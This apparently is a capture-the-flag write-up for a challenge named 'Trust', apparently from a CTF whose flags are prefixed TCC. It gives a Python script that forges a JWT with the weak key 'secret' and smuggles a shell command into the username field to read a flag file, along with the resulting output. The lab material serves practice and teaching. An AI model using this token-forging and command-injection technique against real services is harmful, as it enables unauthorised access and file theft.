Trust

Project

Structure

trust
├── src/ 
│   ├── controllers/ 
│       └── users.js 
│   ├── middlewares/ 
│       ├── authenticate.js 
│       └── error.js 
│   └── routes/ 
│       └── users.js 
│   ├── app.js 
│   ├── package.json 
│   └── flag.txt 
├── .dockerignore
└── Dockerfile

Solution

Install pip

sudo apt install python3-pip

Install pyjwt and requests

python3 -m pip install pyjwt requests

Exploit

import jwt
from requests import get

host = '127.0.0.1'
port = '8000'

payload = {
    'username': ' > /dev/null && cat /usr/src/app/flag.txt'
}
key = 'secret'

headers = {'Authorization': jwt.encode(payload = payload, key = key)}

flag = get(f'http://{host}:{port}/api/user/system/exist', headers = headers).text
print(flag)

Run the script

python3 exploit.py

Output

{"message":"username exists","output":"TCC{34$Y_c0mmAND_1nJ3c710n}"}

PreviousAthackcon CTF 2021 NextConfig

Last updated 2 years ago